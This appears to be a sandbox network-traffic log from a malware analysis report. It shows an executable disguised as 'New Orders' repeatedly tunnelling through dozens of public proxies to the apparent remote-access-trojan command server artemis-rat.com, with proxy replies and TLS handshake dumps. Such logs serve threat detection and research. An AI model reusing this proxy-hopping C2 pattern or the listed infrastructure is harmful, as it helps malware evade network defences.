                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        141192.168.2.95049693.190.24.1194437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.175256968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        142192.168.2.950358172.67.231.3807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.177315950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.331676006 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        143192.168.2.95027113.40.239.13031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.178448915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.468744040 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        144192.168.2.9502613.25.234.17588887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.181076050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.486649990 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        145192.168.2.950301162.243.102.20797647672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.182404041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        146192.168.2.95026382.64.77.30807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.202282906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.533968925 CET555INHTTP/1.1 403 Proxy Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Server: Apache
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Content-Length: 313
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 43 6f 6e 6e 65 63 74 20 74 6f 20 72 65 6d 6f 74 65 20 6d 61 63 68 69 6e 65 20 62 6c 6f 63 6b 65 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Proxy Error</title></head><body><h1>Proxy Error</h1><p>You don't have permission to access this resource.The proxy server could not handle the request<p>Reason: <strong>Connect to remote machine blocked</strong></p></p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        147192.168.2.950385172.67.3.98807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.203880072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.358268023 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        148192.168.2.950388104.24.193.186807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.222291946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.376535892 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        149192.168.2.95017741.223.232.11731287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.222462893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.054277897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.600943089 CET39INHTTP/1.1 200 Connection established
                                                                                        Mar 11, 2024 16:16:45.425533056 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        150192.168.2.950395104.25.81.82807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.222647905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.377048016 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        151192.168.2.95033554.152.3.36807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.223469019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.446372032 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:40.446966887 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 57 c3 a6 01 a8 d1 d4 22 72 84 02 ac f2 57 d3 43 ae eb cd af 0e 9b ef dc 3b 5a e3 b5 21 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e W"rWC;Z!*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:40.663918018 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 6f c0 3b 8c 92 ab 39 31 d6 76 37 ad 6a 6f fd c3 b7 26 2c 40 59 55 29 28 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                        Data Ascii: =9o;91v7jo&,@YU)(DOWNGRD0000*H010Uartemis-rat.com0240311144647Z260311144647Z010Uartemis-rat.com0"0*H0S-m%]Q
                                                                                        Mar 11, 2024 16:16:40.688671112 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 55 1d 4e 78 63 e0 0d 53 ef e0 58 77 61 7a 36 be fd 77 3e 95 06 b3 36 ab a1 81 5c c5 4e a2 57 60 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 73 df de 96 30 78 88 46 5e eb 0f 66 c7 18 b8 34 52 f0 ea 1b c2
                                                                                        Data Ascii: %! UNxcSXwaz6w>6\NW`(s0xF^f4RvAOZ
                                                                                        Mar 11, 2024 16:16:40.904292107 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 f8 39 5f 49 f3 4f a9 c5 36 5f 9f f9 0c a4 2a 53 1d 54 6f fa fe a3 8e 1b 59 39 28 4f ef 7d 33 ef 02 34 84 cd fb 19 0d f3
                                                                                        Data Ascii: (9_IO6_*SToY9(O}34


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        152192.168.2.949760194.4.50.91123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.241266012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        153192.168.2.95027091.202.230.21980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.242573023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        154192.168.2.950396198.23.229.203156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.257929087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        155192.168.2.950300162.19.7.56441957672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.262437105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.595489979 CET24INHTTP/1.1 403 #string


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        156192.168.2.950444172.67.14.237807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.265109062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.419220924 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        157192.168.2.950448185.238.228.240807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.265332937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.419892073 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        158192.168.2.95038720.106.146.21260017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.266053915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        159192.168.2.94978842.200.196.20880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.277643919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.273317099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        160192.168.2.95039367.43.227.228195997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.282504082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.803173065 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        161192.168.2.95040345.196.151.8454327672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.284077883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.503802061 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                        Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Content-Length: 65
                                                                                        Proxy-Authenticate: Basic realm="Proxy"
                                                                                        Connection: close
                                                                                        Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                        Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        162192.168.2.95031789.171.116.65650007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.285362959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        163192.168.2.950330173.249.29.24391237672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.290625095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.599487066 CET536INHTTP/1.1 503 Service Unavailable
                                                                                        Server: squid/3.5.27
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 3832
                                                                                        X-Squid-Error: ERR_DNS_FAIL 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
